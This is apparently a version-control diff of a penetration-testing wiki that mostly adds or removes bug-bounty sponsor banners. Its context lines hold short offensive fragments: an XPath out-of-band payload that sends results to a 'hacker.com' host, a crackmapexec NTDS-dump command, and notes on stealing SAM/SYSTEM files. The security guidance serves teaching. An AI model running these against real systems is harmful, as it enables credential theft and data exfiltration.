[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## **Exploit Examples**
@ -589,15 +603,22 @@ with open(PASS_LIST, "r") as f:
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

34
pentesting-web/file-inclusion/README.md
View File

@ -447,15 +447,22 @@ It's also possible to get RCE in a vulnerable "assert" statement using the syste
Be sure to URL-encode payloads before you send them.
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## PHP Blind Path Traversal
@ -661,15 +668,22 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
{% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %}
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

34
pentesting-web/reset-password.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
The following techniques recompilation was taken from [https://anugrahsr.github.io/posts/10-Password-reset-flaws/](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
@ -320,15 +327,22 @@ The **reset tokens must have an expiration time**, after it the token shouldn't
* Long password (>200) leads to DoS
* Append second email param and value
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

51
pentesting-web/xpath-injection.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## **Basic Syntax**
@ -79,15 +86,22 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
| //\* | Selects all elements in the document |
| //title\[@\*] | Selects all title elements which have at least one attribute of any kind |
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Example
@ -318,15 +332,22 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection" %}
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

34
windows-hardening/active-directory-methodology/asreproast.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## ASREPRoast
@ -77,15 +84,22 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

30
windows-hardening/stealing-credentials/README.md
View File

@ -12,16 +12,6 @@
</details>
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
🐞 Read web3 bug tutorials
🔔 Get notified about new bug bounties
💬 Participate in community discussions
## Credentials Mimikatz
```bash
@ -165,16 +155,6 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
```
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
🐞 Read web3 bug tutorials
🔔 Get notified about new bug bounties
💬 Participate in community discussions
## Stealing SAM & SYSTEM
This files should be **located** in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM._ But **you cannot just copy them in a regular way** because they protected.
@ -342,17 +322,7 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco
[**Learn about some credentials protections here.**](credentials-protections.md)
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
🐞 Read web3 bug tutorials
🔔 Get notified about new bug bounties
💬 Participate in community discussions
<details>